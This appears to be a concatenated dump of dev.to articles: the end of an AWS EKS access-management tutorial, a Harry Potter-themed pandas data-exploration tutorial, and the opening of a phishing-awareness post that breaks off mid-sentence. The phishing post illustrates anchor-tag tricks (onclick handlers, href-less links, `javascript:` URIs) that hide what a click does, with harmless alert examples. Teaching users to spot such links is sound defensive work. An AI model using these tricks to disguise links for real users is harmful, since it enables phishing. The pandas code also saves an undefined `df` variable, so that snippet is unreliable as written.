disassociate-access-policy`](https://docs.aws.amazon.com/cli/latest/reference/eks/disassociate-access-policy.html) - [`aws eks list-associated-access-policies`](https://docs.aws.amazon.com/cli/latest/reference/eks/list-associated-access-policies.html) ### Removing the EKS default root user In the future, you can disable the creation of such a user when creating a cluster with `aws eks create-cluster` by setting `bootstrapClusterCreatorAdminPermissions=false`. Now let’s replace it — give our test user admin permissions, and remove the default root user. Run again `aws eks associate-access-policy`, but now in the `--policy-arn` we specify the `AmazonEKSClusterAdminPolicy`: ``` $ aws --profile work eks associate-access-policy --cluster-name atlas-eks-test-1-28-cluster \ > --principal-arn arn:aws:iam::492***148:user/test-eks-acess-TO-DEL \ > --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy \ > --access-scope type=cluster ``` What about the permissions? ``` $ kubectl auth can-i create pod yes ``` Good, we can anything. Also, now we have two cluster-admins: ![](https://cdn-images-1.medium.com/max/1024/0*thtMqflVOKfuK9i6.png) And we can delete the old one: ``` $ aws --profile work eks delete-access-entry --cluster-name atlas-eks-test-1-28-cluster --principal-arn arn:aws:iam::492***148:role/tf-admin ``` ### Namespaced EKS Access Entry Instead of granting permissions to the entire cluster with the `--access-scope type=cluster`, we can make a user an admin only in specific namespaces. Let’s take another regular IAM User and make him an admin in an only one Kubernetes Namespace. Create a new namespace: ``` $ kk create ns test-ns namespace/test-ns created ``` Create a new EKS Access Entry for my AWS IAM User: ``` $ aws --profile work eks create-access-entry --cluster-name atlas-eks-test-1-28-cluster --principal-arn arn:aws:iam::492***148:user/arseny ``` And connect the `AmazonEKSEditPolicy`, but in the `--access-scope` we set the type `namespace` and specify the name of the namespace: ``` $ aws --profile work eks associate-access-policy --cluster-name atlas-eks-test-1-28-cluster \ > --principal-arn arn:aws:iam::492***148:user/arseny \ > --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSEditPolicy \ > --access-scope type=namespace,namespaces=test-ns ``` In the [`access-scope`](https://docs.aws.amazon.com/cli/latest/reference/eks/associate-access-policy.html#options) we can specify either clutser or namespace. Not very flexible - but for flexibility we have the Kubernetes RBAC. Generate a new `kubectl context` from the `--profile work`, where _profile work_ is my regular AWS User for which we created an EKS Access Entry with `AmazonEKSEditPolicy`: ``` $ aws --profile work eks update-kubeconfig --name atlas-eks-test-1-28-cluster --alias test-cluster-arseny-user Updated context test-cluster-arseny-user in /home/setevoy/.kube/config ``` Check the active `kubectl context`: ``` $ kubectl config current-context test-cluster-arseny-user ``` And check the permissions. First in the `default` Namespace: ``` $ kubectl --namespace default auth can-i create pod no ``` And in a testing namespace: ``` $ kubectl --namespace test-ns auth can-i create pod yes ``` Nice! “It works!” © ### EKS Access Entry, and Kubernetes RBAC Instead of connecting AWS’s EKS Access Policy, of which there are only four, we can use the common [Kubernetes Role-Based Access Control](https://kubernetes.io/docs/reference/access-authn-authz/rbac/), RBAC. Then, it will look like the following: 1. in EKS, create an Access Entry 2. in the Access Entry parameters, specify the Kubernetes RBAC Group 3. and then, as usual, we use RBAC Group and Kubernetes RoleBinding Then we’ll authenticate with AWS, after which AWS will “pass us over” to Kubernetes, and it will perform authorization — checking our permissions in the cluster — based on our RBAC group. Delete the created Access Entry for my IAM User: ``` $ aws --profile work eks delete-access-entry --cluster-name atlas-eks-test-1-28-cluster --principal-arn arn:aws:iam::492***148:user/arseny ``` Create it again, but now add the `--kubernetes-groups` parameter: ``` $ aws --profile work eks create-access-entry --cluster-name atlas-eks-test-1-28-cluster \ > --principal-arn arn:aws:iam::492***148:user/arseny \ > --kubernetes-groups test-eks-rbac-group ``` Check in the AWS Console: ![](https://cdn-images-1.medium.com/max/1024/0*2VabEB2zZdT8rbAl.png) Check the permissions with `kubectl`: ``` $ kubectl --namespace test-ns auth can-i create pod no ``` Because we didn’t add an EKS Access Policy, and we didn’t do anything in RBAC. Let’s create a manifest with a RoleBinding, and bind the RBAC group `test-eks-rbac-group` to the default Kubernetes `edit` ClusterRole: ``` apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: name: test-eks-rbac-binding roleRef: apiGroup: rbac.authorization.k8s.io kind: ClusterRole name: edit subjects: - apiGroup: rbac.authorization.k8s.io kind: Group name: test-eks-rbac-group ``` Switch the `kubectl` context to our admin (I use [`kubectx`](https://github.com/ahmetb/kubectx) for this): ``` $ kx ✔ Switched to context "test-cluster-test-user". ``` And create a RoleBinding in the `test-ns` namespace to give the _Edit_ permissions for our user only in this namespace: ``` $ kubectl --namespace test-ns apply -f test-rbac.yml rolebinding.rbac.authorization.k8s.io/test-eks-rbac-binding created ``` Switch to the `arseny` user: ``` $ kx ✔ Switched to context "test-cluster-arseny-user". ``` And again, check the permissions in two namespaces: ``` $ kubectl --namespace default auth can-i create pod no $ kubectl --namespace test-ns auth can-i create pod yes ``` RBAC is working. So now, that we have seen how the Access Management API mechanism works, we have seen its main features in action, and now we can move on to Terraform. This will be my next post. _Originally published at_ [_RTFM: Linux, DevOps, and system administration_](https://rtfm.co.ua/en/aws-kubernetes-and-access-management-api-the-new-authentification-in-eks/)_._ * * *
setevoy
1,916,548
The Gemika's Magical Guide to Sorting Hogwarts Students using the Decision Tree Algorithm (Part #4A)
4A. Unveiling the Mysteries: Data Exploration (EDA) 🔍 Welcome back to the enchanting halls...
27,991
2024-07-17T06:31:30
https://dev.to/gerryleonugroho/the-gemikas-magical-guide-to-sorting-hogwarts-students-using-the-decision-tree-algorithm-part-4a-4n3n
machinelearning, ai, harrypotter, python
## 4A. Unveiling the Mysteries: Data Exploration (EDA) 🔍 Welcome back to the enchanting halls of Hogwarts, dear sorcerers! As we continue our magical journey into the world of data science, it's time to unveil the **mysteries hidden** within our dataset. In this chapter, we'll embark on a series of explorations that will reveal the secrets of our enchanted scroll (or **dataset**). Think of this as delving into the depths of the [Room of Requirement](https://harrypotter.fandom.com/wiki/Room_of_Requirement), where each discovery leads us to greater understanding. ✨🧙‍♂️ ### **4A.1 Inspecting First Few Rows** Our first step is to take a glimpse at the first few rows of our dataset, much like opening the [Marauder's Map](https://harrypotter.fandom.com/wiki/Marauder%27s_Map) for the first time. This will give us an initial understanding of the structure and contents of our data. ```python # Inspecting the first few rows of the dataset dataset_path = 'data/hogwarts-students.csv' # Path to our dataset hogwarts_df = pd.read_csv(dataset_path) print(hogwarts_df.head()) ``` ``` name gender age origin specialty \ 0 Harry Potter Male 11 England Defense Against the Dark Arts 1 Hermione Granger Female 11 England Transfiguration 2 Ron Weasley Male 11 England Chess 3 Draco Malfoy Male 11 England Potions 4 Luna Lovegood Female 11 Ireland Creatures house blood_status pet wand_type patronus \ 0 Gryffindor Half-blood Owl Holly Stag 1 Gryffindor Muggle-born Cat Vine Otter 2 Gryffindor Pure-blood Rat Ash Jack Russell Terrier 3 Slytherin Pure-blood Owl Hawthorn NaN 4 Ravenclaw Half-blood NaN Fir Hare quidditch_position boggart favorite_class \ 0 Seeker Dementor Defense Against the Dark Arts 1 NaN Failure Arithmancy 2 Keeper Spider Charms 3 Seeker Lord Voldemort Potions 4 NaN Her mother Creatures house_points 0 150.0 1 200.0 2 50.0 3 100.0 4 120.0 ``` As we peer into these rows, we see a variety of features such as **student names**, **house affiliations**, and **various traits**. Each **row is a story**, each **column a chapter**. We might notice, for example, that **Harry, Hermione, and Ron** are all in **_Gryffindor_**, characterized by their bravery and determination. This initial inspection helps us understand the scope and scale of our dataset. --- ### **4A.2 Checking Dataset Features** Next, we delve deeper into the columns of our DataFrame, much like how Hermione would meticulously study her textbooks. Each column represents a different feature of our students, from their house to their magical abilities. ```python # Displaying the columns of the dataset print(hogwarts_df.columns) ``` As the magic spell finished its wizardry, the previous magical spell reveal the following **hidden artifacts**. ``` Index(['name', 'gender', 'age', 'origin', 'specialty', 'house', 'blood_status', 'pet', 'wand_type', 'patronus', 'quidditch_position', 'boggart', 'favorite_class', 'house_points'], dtype='object') ``` ```python # Displaying the how many rows and columns in the dataset print(hogwarts_df.shape) ``` And you're guessing correctly sorcerers, the dataset consists of 52 rows and 14 columns.✨🌟 ``` (52, 14) ``` Let us explore these features, each as significant as a spell component in a well-crafted incantation: - **Name**: The given name of our witch or wizard, from the illustrious Harry Potter to the enigmatic Luna Lovegood. 🌟 - **Gender**: Whether they are a young wizard or witch, reflecting the diversity of Hogwarts. - **Age**: Their age at the time of sorting, for even the youngest students have their place in the castle's storied history. - **Origin**: The place they hail from, be it the rolling hills of England, the rugged highlands of Scotland, or the enchanting isles of Ireland. 🏞️ - **Specialty**: Their area of magical expertise, such as Potions, Transfiguration, or Defense Against the Dark Arts, much like Professor Snape’s mastery of the subtle art of potion-making. - **House**: The revered house to which they belong—Gryffindor, Hufflepuff, Ravenclaw, or Slytherin—each with its own rich traditions and values. - **Blood Status**: Whether they are Pure-blood, Half-blood, or Muggle-born, a detail that, while significant in the wizarding world, never diminishes their magical potential. - **Pet**: Their chosen magical companion, be it an owl, a cat, or a toad, reminiscent of Harry's loyal Hedwig or Hermione's clever Crookshanks. 🦉🐈 - **Wand Type**: The wood and core of their wand, the very tool of their magical prowess. - **Patronus**: The form their Patronus takes, a magical manifestation of their innermost self, like Harry's proud stag or Snape's ethereal doe. 🦌 - **Quidditch Position**: Their role in the beloved wizarding sport, whether Seeker, Chaser, Beater, or Keeper, or perhaps no position at all. - **Boggart**: The form their Boggart takes, a glimpse into their deepest fears. - **Favorite Class**: The subject they excel in or enjoy the most, akin to Hermione's love for Arithmancy or Neville's talent in Herbology. - **House Points**: Points they have contributed to their house, reflecting their achievements and misadventures alike. With this compendium of magical features, we craft our dataset with the precision of a spell-wright composing a new enchantment. Each character's details are meticulously recorded, ensuring that our data is as rich and detailed as the tapestry of Hogwarts itself.🧙‍♂️🏰 By examining these features, we gain a deeper understanding of the dataset's richness, much like a wizard learning about the different properties of magical creatures. As we assemble this treasure trove of information, we prepare ourselves for the next step in our magical journey—transforming these attributes into the foundations upon which our **Decision Tree** algorithm will cast its spell. Let us proceed, dear sorcerers, for the magic is only just beginning.✨🧙‍♂️ --- ### **4A.3 Inspecting Data Types** With a clear understanding of our features, we now turn our attention to the data types. This step is akin to examining the ingredients of a potion, ensuring each component is appropriate for its intended use. ```python # Checking the data types of each column print(hogwarts_df.dtypes) ``` And in return, the previous magic spell would yield us, dear sorcerers the following incarnations. ``` name object gender object age int64 origin object specialty object house object blood_status object pet object wand_type object patronus object quidditch_position object boggart object favorite_class object house_points float64 dtype: object ``` _Wow_, would you look at that, we've just discovered a lot of data types inconsistencies within the dataset. The data types had told us whether each column contains numerical values, text, or other forms of data. For instance, **Age should be a `numerical type`**, while **`Name`** and **`House`** are **`text (or string)`** types. Ensuring these types are correct is crucial for our subsequent analyses and visualizations. --- ### **4A.4 Incorrect Data Type** Occasionally, we may find discrepancies in the data types, much like finding a rogue ingredient in a potion. Correcting these mismatches is essential to ensure the accuracy of our spells (or analyses). So let's just spin our wands (should I say Jupyter Lab), and try to fix them this time. ``` # Converting data types if necessary # First, let's check the columns again to identify the correct names print(hogwarts_df.columns) # Assuming we identified 'age' as the correct column name for age hogwarts_df['age'] = pd.to_numeric(hogwarts_df['age'], errors='coerce') # Ensure Age is numeric # Ensuring 'gender' is categorical hogwarts_df['gender'] = hogwarts_df['gender'].astype('category') # Ensure Gender is categorical # Ensuring 'specialty' is categorical hogwarts_df['specialty'] = hogwarts_df['specialty'].astype('category') # Ensure specialty is categorical # Ensuring 'house' is categorical hogwarts_df['house'] = hogwarts_df['house'].astype('category') # Ensure house is categorical # Ensuring 'blood_status' is categorical hogwarts_df['blood_status'] = hogwarts_df['blood_status'].astype('category') # Ensure blood_status is categorical # Ensuring 'pet' is categorical hogwarts_df['pet'] = hogwarts_df['pet'].astype('category') # Ensure pet is categorical # Ensuring 'wand_type' is categorical hogwarts_df['wand_type'] = hogwarts_df['wand_type'].astype('category') # Ensure wand_type is categorical # Ensuring 'quidditch_position' is categorical hogwarts_df['quidditch_position'] = hogwarts_df['quidditch_position'].astype('category') # Ensure quidditch_position is categorical # Ensuring 'favorite_class' is categorical hogwarts_df['favorite_class'] = hogwarts_df['favorite_class'].astype('category') # Ensure favorite_class is categorical ``` By casting these spells, we ensure that each column is of the appropriate type, ready for further exploration and manipulation. This step is much like Snape meticulously adjusting the ingredients of a complex potion to achieve the perfect brew. Now, once we've done the previous spell, the Jupyter would yield us the following updated results. ``` Index(['name', 'gender', 'age', 'origin', 'specialty', 'house', 'blood_status', 'pet', 'wand_type', 'patronus', 'quidditch_position', 'boggart', 'favorite_class', 'house_points'], dtype='object') ``` Now let's verify the previous spell has done it magical course towards our dataset by invoking the following spell again. ``` # Verify the data types after conversion print(hogwarts_df.dtypes) ``` ``` name object gender category age int64 origin object specialty category house category blood_status category pet category wand_type category patronus object quidditch_position category boggart object favorite_class category house_points float64 dtype: object ``` --- ### **4A.5 Spells and Charms to Convert Data Types** In case you dear sorcerers are wondering how many data types pandas is capable of supporting, following are all the list of them and ways to manipulate them in orders. | Data Type | Description | Example Values | Conversion Method | |-----------|-------------|----------------|--------------------| | **int64** | Integer values | 1, 2, 3, -5, 0 | `pd.to_numeric(df['column'])` | | **float64** | Floating point numbers | 1.0, 2.5, -3.4, 0.0 | `pd.to_numeric(df['column'])` | | **bool** | Boolean values | True, False | `df['column'].astype('bool')` | | **object** | String values | 'apple', 'banana', '123' | `df['column'].astype('str')` | | **datetime64[ns]** | Date and time values | '2024-07-17', '2023-01-01 12:00' | `pd.to_datetime(df['column'])` | | **timedelta[ns]** | Differences between datetimes | '1 days 00:00:00', '2 days 03:04:05' | `pd.to_timedelta(df['column'])` | | **category** | Categorical data | 'A', 'B', 'C' | `df['column'].astype('category')` | --- ### **4A.6 Reinvestigate The Data Type in The Dataset** Having ensured the correctness of our data types, it's time to take a more comprehensive look at our dataset. This step is akin to casting a revealing charm over a hidden room, allowing us to see everything at once. ``` # Displaying a summary of the entire data types print(hogwarts_df.info()) ``` By previewing the whole dataset, we gain a holistic view of its structure, contents, and summary statistics. This comprehensive overview helps us identify any remaining inconsistencies or areas that require further attention, much like a careful sweep of the castle grounds to ensure everything is in order, as the following results. ``` <class 'pandas.core.frame.DataFrame'> RangeIndex: 52 entries, 0 to 51 Data columns (total 14 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 name 52 non-null object 1 gender 52 non-null category 2 age 52 non-null int64 3 origin 52 non-null object 4 specialty 52 non-null category 5 house 52 non-null category 6 blood_status 52 non-null category 7 pet 27 non-null category 8 wand_type 52 non-null category 9 patronus 50 non-null object 10 quidditch_position 10 non-null category 11 boggart 52 non-null object 12 favorite_class 51 non-null category 13 house_points 50 non-null float64 dtypes: category(8), float64(1), int64(1), object(4) memory usage: 6.8+ KB None ``` ### **4A.7 Detailed Summary of Dataset** And here's the interesting part, how one sorcerers may see thing from a high level overview, while this time the spell would give us the following information about the dataset. It's a bit statistical for sure, but fear not dear sorcerers, as you scroll forward, you'll notice couple of other stunning facts around Hogwarts students. ``` print(hogwarts_df.describe(include='all')) # Providing a detailed summary of the dataset ``` ``` name gender age origin specialty house \ count 52 52 52.000000 52 52 52 unique 52 2 NaN 9 24 6 top Harry Potter Male NaN England Charms Gryffindor freq 1 27 NaN 35 7 18 mean NaN NaN 14.942308 NaN NaN NaN std NaN NaN 2.492447 NaN NaN NaN min NaN NaN 11.000000 NaN NaN NaN 25% NaN NaN 13.250000 NaN NaN NaN 50% NaN NaN 16.000000 NaN NaN NaN 75% NaN NaN 17.000000 NaN NaN NaN max NaN NaN 18.000000 NaN NaN NaN blood_status pet wand_type patronus quidditch_position boggart \ count 52 27 52 50 10 52 unique 4 9 28 15 5 11 top Half-blood Owl Fir Non-corporeal Seeker Failure freq 25 11 4 34 5 40 mean NaN NaN NaN NaN NaN NaN std NaN NaN NaN NaN NaN NaN min NaN NaN NaN NaN NaN NaN 25% NaN NaN NaN NaN NaN NaN 50% NaN NaN NaN NaN NaN NaN 75% NaN NaN NaN NaN NaN NaN max NaN NaN NaN NaN NaN NaN favorite_class house_points count 51 50.000000 unique 21 NaN top Charms NaN freq 8 NaN mean NaN 119.200000 std NaN 54.129097 min NaN 10.000000 25% NaN 72.500000 50% NaN 125.000000 75% NaN 160.000000 max NaN 200.000000 ``` From the summary, we can infer several interesting points: - House Distribution: Gryffindor has the highest count with 18 students, showing its prominence. - Age: The average age of students is around 14.94 years, with the youngest being 11 and the oldest 18. - Gender: The dataset includes 27 males and 25 females, showing a fairly balanced gender distribution. - Blood Status: Half-bloods are the most common, with 25 occurrences, indicating a diverse student body. - Wands and Pets: There are 28 unique wand types and 9 different pet types, reflecting the unique personalities and preferences of the students. - Quidditch: Only a few students play Quidditch, with Seeker being the most common position. - Favorite Class: Charms is the most favored class among students, with 8 mentions. - House Points: The average house points are 119.2, with a standard deviation of 54.13, indicating a wide range of performance. --- ### **4A.8 Preview the whole values in the Dataset** For the curious mind that their thoughts flew as fast as their broomstick, here's the magic spell to display the whole values within the dataset. ``` # Displaying a summary of the entire dataset print(hogwarts_df.to_string()) ``` ``` name gender age origin specialty house blood_status pet wand_type patronus quidditch_position boggart favorite_class house_points 0 Harry Potter Male 11 England Defense Against the Dark Arts Gryffindor Half-blood Owl Holly Stag Seeker Dementor Defense Against the Dark Arts 150.0 1 Hermione Granger Female 11 England Transfiguration Gryffindor Muggle-born Cat Vine Otter NaN Failure Arithmancy 200.0 2 Ron Weasley Male 11 England Chess Gryffindor Pure-blood Rat Ash Jack Russell Terrier Keeper Spider Charms 50.0 3 Draco Malfoy Male 11 England Potions Slytherin Pure-blood Owl Hawthorn NaN Seeker Lord Voldemort Potions 100.0 4 Luna Lovegood Female 11 Ireland Creatures Ravenclaw Half-blood NaN Fir Hare NaN Her mother Creatures 120.0 5 Neville Longbottom Male 11 England Herbology Gryffindor Pure-blood Toad Cherry Non-corporeal NaN Severus Snape Herbology 70.0 6 Ginny Weasley Female 11 England Defense Against the Dark Arts Gryffindor Pure-blood Owl Yew Horse Chaser Tom Riddle Defense Against the Dark Arts 140.0 7 Cedric Diggory Male 15 England Quidditch Hufflepuff Pure-blood NaN Ash Non-corporeal Seeker Failure Defense Against the Dark Arts 160.0 8 Cho Chang Female 14 Scotland Charms Ravenclaw Half-blood Owl Hazel Swan Seeker Failure Charms 110.0 9 Severus Snape Male 16 England Potions Slytherin Half-blood NaN Elm Doe NaN Lily Potter Potions 90.0 10 Albus Dumbledore Male 17 England Transfiguration Gryffindor Half-blood Phoenix Elder Phoenix NaN Ariana's death Transfiguration 200.0 11 Minerva McGonagall Female 16 Scotland Transfiguration Gryffindor Half-blood Cat Fir Cat NaN Failure Transfiguration 190.0 12 Bellatrix Lestrange Female 15 England Dark Arts Slytherin Pure-blood NaN Walnut NaN Azkaban Dueling 80 NaN 13 Nymphadora Tonks Female 14 Wales Metamorphmagus Hufflepuff Half-blood Owl Blackthorn Wolf NaN Failure Defense Against the Dark Arts 130.0 14 Remus Lupin Male 16 England Defense Against the Dark Arts Gryffindor Half-blood Dog Cypress Non-corporeal NaN Full Moon Defense Against the Dark Arts 150.0 15 Sirius Black Male 16 England Transfiguration Gryffindor Pure-blood Owl Chestnut Dog Beater Full Moon Defense Against the Dark Arts 140.0 16 Horace Slughorn Male 16 England Potions Slytherin Half-blood NaN Cedar Non-corporeal NaN Failure Potions 100.0 17 Filius Flitwick Male 17 England Charms Ravenclaw Half-blood NaN Hornbeam Non-corporeal NaN Failure Charms 180.0 18 Pomona Sprout Female 16 England Herbology Hufflepuff Pure-blood Cat Pine Non-corporeal NaN Failure Herbology 170.0 19 Helena Ravenclaw Female 17 Scotland Charms Ravenclaw Pure-blood NaN Rowan Non-corporeal NaN Her mother Charms 160.0 20 Godric Gryffindor Male 17 England Dueling Gryffindor Pure-blood NaN Sword Lion NaN Failure Dueling 200.0 21 Helga Hufflepuff Female 17 Wales Herbology Hufflepuff Pure-blood NaN Cedar Non-corporeal NaN Failure Herbology 190.0 22 Rowena Ravenclaw Female 17 Scotland Charms Ravenclaw Pure-blood NaN Maple Eagle NaN Failure Charms 180.0 23 Salazar Slytherin Male 17 England Dark Arts Slytherin Pure-blood NaN Ebony Serpent NaN Failure Dark Arts 200.0 24 Molly Weasley Female 16 England Household Charms Gryffindor Pure-blood Owl Pine Non-corporeal NaN Failure Household Charms 80.0 25 Arthur Weasley Male 16 England Muggle Artifacts Gryffindor Pure-blood NaN Hornbeam Non-corporeal NaN Failure Muggle Studies 60.0 26 Lucius Malfoy Male 16 England Dark Arts Slytherin Pure-blood Owl Elm Non-corporeal NaN Failure Dark Arts 90.0 27 Narcissa Malfoy Female 15 England Potions Slytherin Pure-blood NaN Hawthorn Non-corporeal NaN Failure Potions 70.0 28 Pansy Parkinson Female 11 England Gossip Slytherin Pure-blood Cat Birch Non-corporeal NaN Failure Gossip 40.0 29 Vincent Crabbe Male 11 England Strength Slytherin Pure-blood NaN Oak Non-corporeal NaN Failure Strength 50.0 30 Gregory Goyle Male 11 England Strength Slytherin Pure-blood NaN Alder Non-corporeal NaN Failure Strength 50.0 31 Lily Evans Female 11 England Charms Gryffindor Muggle-born NaN Willow Doe NaN Failure Charms 150.0 32 James Potter Male 11 England Dueling Gryffindor Pure-blood Owl Walnut Stag Chaser Failure Dueling 160.0 33 Peter Pettigrew Male 11 England Transformation Gryffindor Half-blood Rat Ash Non-corporeal NaN Failure Transformation 30.0 34 Gilderoy Lockhart Male 15 England Memory Charms Ravenclaw Half-blood NaN Cherry Non-corporeal NaN Failure Memory Charms 70.0 35 Dolores Umbridge Female 15 England Dark Arts Slytherin Half-blood Cat Hemlock Non-corporeal NaN Failure Dark Arts 60.0 36 Newt Scamander Male 17 England Magical Creatures Hufflepuff Half-blood Demiguise Chestnut Non-corporeal NaN Failure Creatures 160.0 37 Tina Goldstein Female 17 USA Auror Hufflepuff Half-blood Owl Ash Non-corporeal NaN Failure Defense Against the Dark Arts 140.0 38 Queenie Goldstein Female 17 USA Legilimency Ravenclaw Half-blood Owl Cypress Non-corporeal NaN Failure Legilimency 130.0 39 Jacob Kowalski Male 17 USA Baking Hufflepuff No-mag NaN Birch Non-corporeal NaN Failure Baking 10.0 40 Theseus Scamander Male 17 England Auror Gryffindor Half-blood Dog Elder Non-corporeal NaN Failure Defense Against the Dark Arts 150.0 41 Leta Lestrange Female 16 England Potions Slytherin Pure-blood Cat Ebony Non-corporeal NaN Failure Potions 100.0 42 Nagini Female 18 Indonesia Transformation Slytherin Half-blood Snake Teak Non-corporeal NaN Failure Transformation 90.0 43 Grindelwald Male 18 Europe Dark Arts Slytherin Pure-blood NaN Elder Non-corporeal NaN Failure Dark Arts 200.0 44 Bathilda Bagshot Female 17 England History of Magic Ravenclaw Half-blood Cat Willow Non-corporeal NaN Failure NaN NaN 45 Aberforth Dumbledore Male 17 England Goat Charming Gryffindor Half-blood Goat Oak Non-corporeal NaN Failure Goat Charming 70.0 46 Ariana Dumbledore Female 14 England Obscurus Gryffindor Half-blood NaN Fir Non-corporeal NaN Failure Obscurus 20.0 47 Victor Krum Male 17 Bulgaria Quidditch Durmstrang Pure-blood NaN Hawthorn Non-corporeal Seeker Failure Quidditch 180.0 48 Fleur Delacour Female 17 France Charms Beauxbatons Half-blood NaN Rosewood Non-corporeal NaN Failure Charms 140.0 49 Gabrielle Delacour Female 14 France Charms Beauxbatons Half-blood NaN Alder Non-corporeal NaN Failure Charms 80.0 50 Olympe Maxime Female 17 France Strength Beauxbatons Half-blood NaN Fir Non-corporeal NaN Failure Strength 110.0 51 Igor Karkaroff Male 18 Europe Dark Arts Durmstrang Half-blood NaN Yew Non-corporeal NaN Failure Dark Arts 90.0 ``` Once we've manipulated the data types from the dataset, it's time to save the existing dataset, so that it'd be ready for our next set of adventures. ``` df.to_csv('data/hogwarts-students-01.csv') ``` ### **4A.9 Gemika's Pop-Up Quiz: Unveiling the Mysteries** And now, young wizards and witches, my son Gemika Haziq Nugroho appears with a sparkle in his eye and a quiz at the ready. Are you prepared to test your newfound knowledge and prove your prowess in data exploration? 1. **What function do we use to display the first few rows of a DataFrame**? 2. **Why is it important to check the data types of each column in our dataset**? 3. **How can we convert a column to a numeric type if it's not already**? Answer these questions with confidence, and you will demonstrate your mastery of the initial steps in data exploration. With our dataset now fully understood and prepared, we are ready to dive even deeper into its mysteries. Onward, to greater discoveries! 🌟✨🧙‍♂️ By now, you should feel like a true data wizard, ready to uncover the hidden patterns and secrets within any dataset. Let us continue our journey with confidence and curiosity, for there is much more to discover in the magical world of data science! 🌌🔍
gerryleonugroho
1,916,595
Stop Phishing by Analyzing the Bait
Phishing is a cybersecurity threat that relies on human error or trust. It's a social engineering attack intent on obtaining information by getting a user to open an email or click on a link. Can I build a tool that could help users to know something about a link before they click on it?
0
2024-07-12T21:10:44
https://dev.to/rebeccapeltz/stop-phishing-by-analyzing-the-bait-3f0f
cybersecurity, phishing, browserextension
--- title: Stop Phishing by Analyzing the Bait published: true description: Phishing is a cybersecurity threat that relies on human error or trust. It's a social engineering attack intent on obtaining information by getting a user to open an email or click on a link. Can I build a tool that could help users to know something about a link before they click on it? tags: cybersecurity, phishing, browserextension cover_image: https://res.cloudinary.com/picturecloud7/image/upload/c_pad,h_420,w_1000,b_auto/no-fishing-allowed_w1ikle.jpg # Use a ratio of 100:42 for best results. # published_at: 2024-07-08 23:32 +0000 --- CyberSecurityNews.com published a gif on X showing [Top 8 Cyber Attacks 2024](https://x.com/The_Cyber_News/status/1769244926984765858) last spring that shows the top 8 cybersecurity threats for 2024. This chart has popped up in many places. I like the way it's paired with Beethoven's Moonlight Sonata here: {% embed https://youtu.be/aVPfexDpikM?si=ilOytMBbtNXxKWhg %} I've worked on product releases where we just scoured the front end to try to eliminate any HTML that might lead to a security issue If you look closely at the list 3 out 8 of these attacks rely on front end software, that is, a vulnerability in the browser. Fullstack application developers can use this awareness to help prevent these problems. The list of attacks is shown below. Attacks 1, 5, and 6 are attacks that occur in the browser. 1. Phishing 2. Ransomware 3. Denial of Service (DoS) 4. Man-in-the-middle (MiTM) 5. SQL Injection 6. Cross Site Scripting (XSS) 7. Zero-Day Exploits 8. DNS Spoofing Both Phishing and Cross Site Scripting rely on links that a user clicks on to carry out the attack. In the case of Phishing the link is in often in an email. In this post, I'm going to focus on Phishing. Both Phishing and Cross Site Scripting are forms of Social Engineering that rely on the user's trust and possibly lack of knowledge. I'm going to focus on Phishing in this post because it is one of the most prevalent types of attack. Companies are aware of the losses that result from cyber crimes, and instruct employees in what to look for to prevent attacks that involve links. However, the nature and attributes of the HTML anchor element that is used to create links might make it difficult for users to spot a problem with the link. I've worked on product releases where the goal is rework any HTML that could create a vulnerability. But in the end, if you tell a user to 'hover over each link on the email and make sure that the underlying URL looks OK', you're asking a lot. Let's look at the anchor tag attribute variations that might make it difficult for a user to just hover over the link to determine if the link is OK. **1. Expected Anchor Element.** The HTML anchor tag was created to make navigation between web pages easier. The structure of a basic anchor element does this includes a URL assigned to an href attribute and text content that describes where the URL will navigate to. ```html <a href="https://www.example.com" target="_blank">Example</a> ``` The design of the anchor element strongly suggests that the user shouldn't have to know what the URL is. If the URL is to be known, it could be copied in the text content. If all the URLs were spelled out, it would make for an unattractive and probably messy looking web page. This variation is the most commonly used. If the user hovers over `Example` they will see `https://www.example.com`. **2. Using `onclick` in an Anchor Element.** We can introduce more complex instructions into the anchor tag by adding an `onclick` event handler and JavaScript. Here are three examples of what we can do when we want to run some JavaScript when the link is clicked. In all cases, hovering over the link won't show you the `onclick` event. **a. `onclick` returns false.** When you the JavaScript in the onclick handler returns false, the navigation to the URL in href is not executed. But if there is a problem from the JavaScript itself, it's too late once you've clicked on a link in which hovering over it showed a URL that was OK ```html <a href="https://www.example.com" target="_blank" onclick="alert('hello'); return false;">Say Hello</a> ``` **b. `onclick` doesn't return false.** If the `onclick` handler JavaScript code doesn't return false, then the link will navigate as intended. Hovering over the link will return an OK URL and the code will navigate to the URL. In this case, all will seem well, but if the JavaScript contained a problem, it's too late to fix it. ```html <a href="https://www.example.com" onClick="alert('found me')" target="_blank">onClick me</a> ``` **c. anchor tag doesn't contain an href attribute.** If the `href` is not included in the anchor tag element will render without text decoration, but will still be clickable if an `onclick` is included. For users that are used to clickable items showing some sign of click-ability like `text-decoration` or a CSS that style to clickable text to look like a button, there may be some confusion here. A user instructed to hover over links would likely ignore clicking on this entirely. ```html <a onClick="alert('found me')" target="_blank">onclick me</a> ``` **3. No encryption in URL.** If the URL references a site that doesn't use encryption, like `http://www.example.com` vs. `https://www.example.com`, this could a raise a question. These days browser will often encrypt the web page even if the scheme is `http`. There are extensions and settings to make browsers automatically encrypt, but if the user hovers, and finds that HTTP instead of HTTPS is used, this could be the sign of a problem. ```html <a href="http://info.cern.ch/" target="_blank" onclick="alert('my href is unencrypted but chrome will make it secure')"; return true;>info.cern.ch is unencrypted</a> ``` **4. `href` refers to a URI with a `javascript:` pseudo scheme.** Although it's most common to see a scheme in a URI like `https:`, other schemes are in use. For example `mailto:` and `tel:` are used to send message via email and SMS. These schemes are followed by email addresses and telephone numbers. These are refereed to as URI's instead of URL's. The scheme is provided an **identifier** instead of a **location**. Both `mailto:` and `tel:` are visible when hovering on a link. It's also possible to use `javascript:` as a scheme. It is then followed by a call to a function in the context of the HTML. In the example below it is calling the function `doSomething`. This will be visible upon hovering, but because the contents of the JavaScript code is not known, it may raise a question. ```html <a href="javascript:doSomething()">Javascript me</a> ``` I hope the examples above show how difficult it could be for a user to determine if a link in their email should be clicked on or reported as a possible threat. What's the solution? ## Create a Browser Extension What is needed is a full analysis and report on what is going on within the links on a webpage. There needs to be a way to quickly generate some information that shows the links without hovering and provides alerts as to which links may have some unexpected attribute settings. We need a Phish Bait analyzer report. It would be nice if browsers had this feature, but until they do we can create a Chrome extension to do it. I created an extension named [Link 